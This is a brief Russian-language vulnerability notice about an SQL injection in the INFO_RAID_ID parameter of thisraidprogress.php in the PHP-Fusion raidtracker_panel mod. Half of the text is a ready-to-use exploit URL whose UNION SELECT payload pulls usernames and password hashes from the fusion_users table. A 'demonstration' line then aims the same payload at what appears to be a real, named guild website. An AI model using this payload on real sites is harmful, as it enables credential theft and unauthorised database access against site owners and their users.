Программа: PHP-Fusion Mod raidtracker_panel
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «INFO_RAID_ID» сценарием
thisraidprogress.php. Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.
Эксплоит:
http://www.xxxxxxx.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=
-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users--
Демонстрация:
http://differenceguild.com/infusions/raidtracker_panel/thisraidprogress.php?INFO_RAID_ID=
-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users--
